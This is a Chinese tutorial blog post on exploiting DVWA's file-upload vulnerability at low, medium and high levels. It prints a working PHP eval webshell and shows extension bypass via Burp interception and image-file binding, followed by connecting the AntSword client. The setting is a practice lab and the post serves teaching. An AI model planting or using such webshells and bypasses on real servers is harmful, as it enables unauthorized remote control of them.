DVWA文件上传

DVWA文件上传

文件上传漏洞,通常是由于对上传文件的mame类型、没有进行严格的过滤、检查,使得攻击者可以通过上传木马,获取服务器的webshell权限,件上传漏洞带来的危害常常是毁灭性的
文件上传漏洞的利用是有限制条件的,首先当然是要能够成功上传木马文件,其次上传文件必须能够被执行,最后就是上传文件的路径必须可知的。

我们测试的靶场是dvwa,至于怎么搭建可以自行百度。

工具:burp,一句话,靶场环境,蚁剑
在这里插入图片描述

LOW级别漏洞利用

1.创建一个txt文件将<?php @eval($_REQUEST["mima"])?>复制到里面去,然后将后缀名改成php。
2.打开靶场,选择文件
在这里插入图片描述3.点击uplaod上传,
在这里插入图片描述上传成功,http://192.168.80.132/dvwa/hackable/uploads/1.php
密码是:mima
4.打开蚁剑,选择添加数据,复制粘贴以上内容,链接类型选择php
密面是mima
在这里插入图片描述点击添加,添加完成双击访问网站目录、。
在这里插入图片描述Medium级别
1,首先我们将我们之前的一句话木马文件后缀名改成png图片类型,然后选择。在这里插入图片描述3,打开浏览器设置代理,然后确定保存
在这里插入图片描述4,这个时候打开burp,打开抓包。然后点击图1的uplaod进上传,这个时候我们的burp会拦截数据包,我们将图下画圈位置的地方的那个文件后缀名改成php,然后点击forward转发
在这里插入图片描述ok
在这里插入图片描述
这个时候我们已经可以看到已经上传成功了。我们继low级别链接蚁剑的操作,继续操作就可以链接了!==

high级别

1.首先准备一个jpg图片和一个php文件,放在同一个目录下,然后使用copy工具将两个文件捆绑在一起。在这里插入图片描述

_
2.然后打开010查看是否捆绑成功+在这里插入图片描述

可以看出已经捆绑成功了
3.然后打开靶场进行上传。
在这里插入图片描述ok已經上传成功了

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值